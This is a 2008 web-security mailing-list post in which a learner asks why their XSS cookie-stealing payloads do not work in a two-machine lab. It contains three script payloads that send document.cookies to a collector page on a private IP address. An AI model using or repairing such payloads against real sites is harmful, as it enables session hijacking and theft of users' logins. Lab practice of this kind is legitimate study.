[WEB SECURITY] XSS Help

GsNaseer Gs gsnas29 at yahoo.co.in
Thu Jun 5 09:20:43 EDT 2008


Hi!
I am new to this forum, I was practising to learn to concepts of XSS(Cross-Site-Scripting), I am using two different applications on two different machines. i want to dump cookies of one application into another application database. For that i am using 
this script to send cookies, 
<script src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+document.cookies>
<script src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+escape(document.cookies)>
<script>new Image().src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+encodeURI(document.cookies)</script>
/*Non of these scripts are working for me*/
i am able to dump a blank record without any cookies values (null) , i am trying out this on IE 7
pls can anybody help me, and guide to through where i am wrong........
Thanks


      Bollywood, fun, friendship, sports and more. You name it, we have it on http://in.promos.yahoo.com/groups/bestofyahoo/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20080605/5e8287ab/attachment.html>


More information about the websecurity mailing list